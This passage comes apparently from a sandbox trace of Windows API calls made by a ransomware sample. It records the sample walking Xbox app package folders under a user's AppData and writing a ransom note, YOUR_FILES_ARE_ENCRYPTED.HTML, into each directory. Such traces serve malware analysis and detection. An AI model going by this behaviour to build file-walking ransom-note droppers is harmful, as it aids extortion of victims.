pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 135 [0120.945] GetProcessHeap () returned 0x600000 [0120.945] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.946] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.947] CloseHandle (hObject=0x320) returned 1 [0120.947] GetProcessHeap () returned 0x600000 [0120.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.947] GetProcessHeap () returned 0x600000 [0120.947] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.947] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0120.947] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.947] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState") returned 101 [0120.947] GetProcessHeap () returned 0x600000 [0120.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.947] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState" [0120.947] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\*" [0120.947] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0120.947] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.947] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0120.947] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0120.947] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.947] GetProcessHeap () returned 0x600000 [0120.947] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.948] WriteFile (in: hFile=0x320, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.949] CloseHandle (hObject=0x320) returned 1 [0120.949] GetProcessHeap () returned 0x600000 [0120.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.949] GetProcessHeap () returned 0x600000 [0120.949] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.949] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bdb8021, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9bdb8021, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9bdb8021, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0120.949] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.949] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0120.949] GetProcessHeap () returned 0x600000 [0120.949] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314f020 [0120.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0120.950] WriteFile (in: hFile=0x214, lpBuffer=0x314f020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x314f020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0120.951] CloseHandle (hObject=0x214) returned 1 [0120.951] GetProcessHeap () returned 0x600000 [0120.951] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314f020 | out: hHeap=0x600000) returned 1 [0120.951] GetProcessHeap () returned 0x600000 [0120.951] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0120.952] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.XboxIdentityProvider_cw5n1h2txyewy", cAlternateFileName="MICROS~2.XBO")) returned 1 [0120.952] StrStrIW (lpFirst="Microsoft.XboxIdentityProvider_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.952] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy") returned 93 [0120.952] GetProcessHeap () returned 0x600000 [0120.952] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0120.953] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy" [0120.953] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\*" [0120.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0120.954] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d41224c, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d759694, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d759694, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0120.954] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0120.954] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.954] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC") returned 96 [0120.954] GetProcessHeap () returned 0x600000 [0120.954] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.954] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC" [0120.954] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\*" [0120.955] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0120.955] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0120.955] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0120.955] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.955] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache") returned 106 [0120.956] GetProcessHeap () returned 0x600000 [0120.956] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.956] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache" [0120.956] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache\\*" [0120.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.957] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.957] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.957] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.958] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0120.958] GetProcessHeap () returned 0x600000 [0120.958] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.959] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.959] CloseHandle (hObject=0x324) returned 1 [0120.959] GetProcessHeap () returned 0x600000 [0120.960] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.960] GetProcessHeap () returned 0x600000 [0120.960] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.960] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d14c, dwReserved1=0x63d090, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.960] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.960] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies") returned 108 [0120.960] GetProcessHeap () returned 0x600000 [0120.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.960] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies" [0120.960] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies\\*" [0120.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0120.966] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0120.966] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9d45e7c4, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x9d45e7c4, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9d45e7c4, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x314d2b8, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 0 [0120.966] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0120.966] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0120.966] GetProcessHeap () returned 0x600000 [0120.966] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxIdentityProvider_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxidentityprovider_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 